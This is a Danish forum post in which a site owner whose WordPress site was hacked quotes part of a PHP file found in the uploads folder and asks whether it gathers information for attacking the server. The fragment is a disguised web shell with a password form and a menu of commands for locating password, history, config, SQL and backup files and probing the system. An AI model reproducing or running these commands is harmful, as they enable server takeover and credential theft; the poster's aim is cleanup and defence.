Hej
Vores side er iff. Google blevet hacked og i Wordpress' rod var flere dirs tilhørende forskellige fremmede domæner.
Jeg har slettet omtalte dirs og ledt systematisk efter php-filer med kode, der ikke skal være der.
I diret uploads findes en php-fil med bl.a. følgende kode:
/..snip
function wpLicense2($i){$a=Array('WPluginstripslashes',"<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form>",'pass','pass','HTTP_HOST','HTTP_HOST','HTTP_HOST',"win",'win','nix','safe_mode','disable_functions','c','c','win',"\\","/","\\","/",'/','/','HTTP_HOST','ajax','HTTP_HOST','ajax','win',"List Directory","dir","Find index.php in current dir","dir /s /w /b index.php","Find *config*.php in current dir","dir /s /w /b *config*.php","Show active connections","netstat -an","Show running services","net start","User accounts","net user","Show computers","net view","ARP Table","arp -a","IP Configuration","ipconfig /all","List dir","ls -lha","list file attributes on a Linux second extended file system","lsattr -va","show opened ports","netstat -an | grep -i listen","process status","ps aux","Find","","find all suid files","find / -type f -perm -04000 -ls","find suid files in current dir","find . -type f -perm -04000 -ls","find all sgid files","find / -type f -perm -02000 -ls","find sgid files in current dir","find . -type f -perm -02000 -ls","find config.inc.php files","find / -type f -name config.inc.php","find config* files","find / -type f -name \"config*\"","find config* files in current dir","find . -type f -name \"config*\"","find all writable folders and files","find / -perm -2 -ls","find all writable folders and files in current dir","find . -perm -2 -ls","find all service.pwd files","find / -type f -name service.pwd","find service.pwd files in current dir","find . -type f -name service.pwd","find all .htpasswd files","find / -type f -name .htpasswd","find .htpasswd files in current dir","find . -type f -name .htpasswd","find all .bash_history files","find / -type f -name .bash_history","find .bash_history files in current dir","find . -type f -name .bash_history","find all .fetchmailrc files","find / -type f -name .fetchmailrc","find .fetchmailrc files in current dir","find . -type f -name .fetchmailrc","Locate","","locate httpd.conf files","locate httpd.conf","locate vhosts.conf files","locate vhosts.conf","locate proftpd.conf files","locate proftpd.conf","locate psybnc.conf files","locate psybnc.conf","locate my.conf files","locate my.conf","locate admin.php files","locate admin.php","locate cfg.php files","locate cfg.php","locate conf.php files","locate conf.php","locate config.dat files","locate config.dat","locate config.php files","locate config.php","locate config.inc files","locate config.inc","locate config.inc.php","locate config.inc.php","locate config.default.php files","locate config.default.php","locate config* files ","locate config","locate .conf files","locate '.conf'","locate .pwd files","locate '.pwd'","locate .sql files","locate '.sql'","locate .htpasswd files","locate '.htpasswd'","locate .bash_history files","locate '.bash_history'","locate .mysql_history files","locate '.mysql_history'","locate .fetchmailrc files","locate '.fetchmailrc'","locate backup files","locate backup","locate dump files","locate dump","locate priv files","locate priv",'charset','charset','wpplugin_charset',"<html><head><meta http-equiv='Content-Type' content='text/html; charset=",'charset',"'><title>",'HTTP_HOST'," - WPlugin ",'cwd',"';
..snip/
Mit spørgsmål er, om ikke denne kode fremskaffer oplysninger, der kan bruges til at hacke serveren?
Mvh
not a support question